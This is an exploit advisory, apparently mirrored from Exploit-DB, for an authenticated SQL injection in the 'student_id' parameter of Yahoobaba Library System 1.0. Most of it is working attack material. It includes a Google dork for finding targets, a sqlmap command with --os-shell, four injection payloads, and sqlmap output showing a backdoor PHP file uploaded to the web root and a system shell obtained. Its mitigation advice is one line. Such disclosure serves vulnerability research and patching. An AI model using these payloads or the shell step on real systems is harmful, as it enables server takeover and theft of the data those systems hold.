Library System 1.0 - 'student_id' SQL injection (Authenticated)

vendor:

Library System

by:

Vinay Bhuria

9,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Library System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:yahoobaba:library_system:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2021

Library System 1.0 – ‘student_id’ SQL injection (Authenticated)

The Library System 1.0 application from Yahoobaba is vulnerable to SQL injection via the 'student_id' parameter on the student.php page. The 'student_id' parameter is vulnerable to SQL injection, it was also tested, and an authenticated user has the full ability to run system commands via --os-shell and fully compromise the system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title: Library System 1.0 - 'student_id' SQL injection (Authenticated)
# Google Dork: intitle: "Library System by YahooBaba"
# Date: 26/08/2021
# Exploit Author: Vinay Bhuria
# Vendor Homepage: https://www.yahoobaba.net
# Software Link: https://www.yahoobaba.net/project/library-system-in-php
# Version: v1.0
# Tested on: Windows

Description:

The Library System 1.0 application from Yahoobaba is vulnerable to
SQL injection via the 'student_id' parameter on the student.php page.

==================== 1. SQLi ====================

http://localhost:8081/library-system/student.php

The "student_id" parameter is vulnerable to SQL injection, it was also tested, and an authenticated
user has the full ability to run system commands via --os-shell and fully compromise the system

POST parameter 'student_id' is vulnerable.

step 1 : Navigate to the "Reg student >> View" & capture the request in the proxy tool.
step 2 : Now copy the post request and save it as test.txt file.
step 3 : Run the sqlmap command "sqlmap -r test.txt -p student_id --os-shell"

----------------------------------------------------------------------
Parameter: student_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: student_id=14 AND 9655=9655

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: student_id=14 OR (SELECT 5735 FROM(SELECT COUNT(*),CONCAT(0x7170717871,(SELECT (ELT(5735=5735,1))),0x716a787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: student_id=14 AND (SELECT 2937 FROM (SELECT(SLEEP(5)))UeMT)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: student_id=14 UNION ALL SELECT NULL,NULL,CONCAT(0x7170717871,0x64697648614c6b48736a5a72484e52794d4764507670436659596379577748794a4878747162596c,0x716a787871),NULL,NULL,NULL,NULL,NULL-- -

[14:03:50] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:8081/tmpbctla.php
[14:03:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'desktop-Vinay\vinay'